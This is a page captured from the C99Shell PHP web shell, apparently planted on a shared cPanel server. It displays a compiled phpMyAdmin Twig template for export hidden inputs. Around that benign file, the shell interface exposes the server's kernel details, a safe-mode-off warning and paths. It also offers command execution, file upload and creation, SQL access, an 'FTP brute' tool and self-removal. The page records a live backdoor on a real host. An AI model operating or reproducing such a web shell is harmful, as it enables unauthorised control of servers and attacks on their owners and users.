!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.3.29 

uname -a: Linux tardis23.nocplanet.net 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024
x86_64
 

 

Safe-mode: OFF (not secure)

/home/memoriacel/tmp/pma_template_compiles_memoriacel/twig/db/   drwxr-xr-x
Free 986.42 GB of 1859.98 GB (53.03%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     dbe5bcc412efde0f1f60b79cac99c63a3b523e124f6a0fa4fb06edb442aa39b7.php (3.49 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

use Twig\Environment;
use 
Twig\Error\LoaderError;
use 
Twig\Error\RuntimeError;
use 
Twig\Markup;
use 
Twig\Sandbox\SecurityError;
use 
Twig\Sandbox\SecurityNotAllowedTagError;
use 
Twig\Sandbox\SecurityNotAllowedFilterError;
use 
Twig\Sandbox\SecurityNotAllowedFunctionError;
use 
Twig\Source;
use 
Twig\Template;

/* display/export/hidden_inputs.twig */
class __TwigTemplate_7f8d5fc4c7928595ab67d1e138c067d20189140fbd5071fdc37d43106174275a extends \Twig\Template
{
    public function 
__construct(Environment $env)
    {
        
parent::__construct($env);

        
$this->parent false;

        
$this->blocks = [
        ];
    }

    protected function 
doDisplay(array $context, array $blocks = [])
    {
        
// line 1
        
if ((($context["export_type"] ?? null) == "server")) {
            
// line 2
            
echo "    ";
            echo 
PhpMyAdmin\Url::getHiddenInputs(""""1);
            echo 
"
"
;
        } elseif ((        
// line 3
($context["export_type"] ?? null) == "database")) {
            
// line 4
            
echo "    ";
            echo 
PhpMyAdmin\Url::getHiddenInputs(($context["db"] ?? null), ""1);
            echo 
"
"
;
        } else {
            
// line 6
            
echo "    ";
            echo 
PhpMyAdmin\Url::getHiddenInputs(($context["db"] ?? null), ($context["table"] ?? null), 1);
            echo 
"
"
;
        }
        
// line 8
        
echo "
"
;
        
// line 10
        
if ( !twig_test_empty(($context["single_table"] ?? null))) {
            
// line 11
            
echo "    <input type=\"hidden\" name=\"single_table\" value=\"TRUE\">
"
;
        }
        
// line 13
        
echo "
<input type=\"hidden\" name=\"export_type\" value=\""
;
        
// line 14
        
echo twig_escape_filter($this->env, ($context["export_type"] ?? null), "html"nulltrue);
        echo 
"\">

"
;
        
// line 17
        
echo "<input type=\"hidden\" name=\"export_method\" value=\"";
        echo 
twig_escape_filter($this->env, ($context["export_method"] ?? null), "html"nulltrue);
        echo 
"\">

"
;
        
// line 19
        
if ( !twig_test_empty(($context["sql_query"] ?? null))) {
            
// line 20
            
echo "    <input type=\"hidden\" name=\"sql_query\" value=\"";
            echo 
twig_escape_filter($this->env, ($context["sql_query"] ?? null), "html"nulltrue);
            echo 
"\">
"
;
        }
        
// line 22
        
echo "
<input type=\"hidden\" name=\"template_id\" value=\""
;
        
// line 23
        
echo twig_escape_filter($this->env, ($context["template_id"] ?? null), "html"nulltrue);
        echo 
"\">
"
;
    }

    public function 
getTemplateName()
    {
        return 
"display/export/hidden_inputs.twig";
    }

    public function 
isTraitable()
    {
        return 
false;
    }

    public function 
getDebugInfo()
    {
        return array (  
85 => 23,  82 => 22,  76 => 20,  74 => 19,  68 => 17,  63 => 14,  60 => 13,  56 => 11,  54 => 10,  51 => 8,  45 => 6,  39 => 4,  37 => 3,  32 => 2,  30 => 1,);
    }

    
/** @deprecated since 1.27 (to be removed in 2.0). Use getSourceContext() instead */
    
public function getSource()
    {
        @
trigger_error('The '.__METHOD__.' method is deprecated since version 1.27 and will be removed in 2.0. Use getSourceContext() instead.'E_USER_DEPRECATED);

        return 
$this->getSourceContext()->getCode();
    }

    public function 
getSourceContext()
    {
        return new 
Source("""display/export/hidden_inputs.twig""/usr/local/cpanel/base/3rdparty/phpMyAdmin/templates/display/export/hidden_inputs.twig");
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.2053 ]--